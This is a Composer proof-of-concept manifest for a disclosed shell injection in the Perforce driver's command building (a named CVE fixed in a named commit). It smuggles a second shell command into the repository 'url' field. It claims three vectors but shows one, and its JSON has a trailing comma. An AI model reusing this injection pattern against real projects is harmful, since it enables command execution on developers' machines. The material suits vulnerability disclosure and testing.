{
    "name": "poc/4fcc13d4-perforce-shell-injection",
    "description": "PoC: triggers shell injection in Perforce generateP4Command (fixed in 4fcc13d42). Affects Composer <= 2.9.5 (CVE-2026-40261). Three injection vectors are demonstrated via repository config values that were previously interpolated unsanitized into shell command strings.",
    "require": {
        "vendor/some-perforce-package": "dev-main"
    },
    "repositories": [
        {
            "comment": "VECTOR 1 — inject via 'url' (becomes -p <port>). Old code: generateP4Command built '-p ' . ProcessExecutor::escape($port) as a string, but ProcessExecutor::escape was NOT used consistently in all callers before this commit. Switching to array args fully neutralizes this.",
            "type": "perforce",
            "url": "localhost:1666; touch /tmp/pwned_via_port",
            "depot": "depot",
            "branch": "main",
            "p4user": "user"
        },
    ],
    "minimum-stability": "dev"
}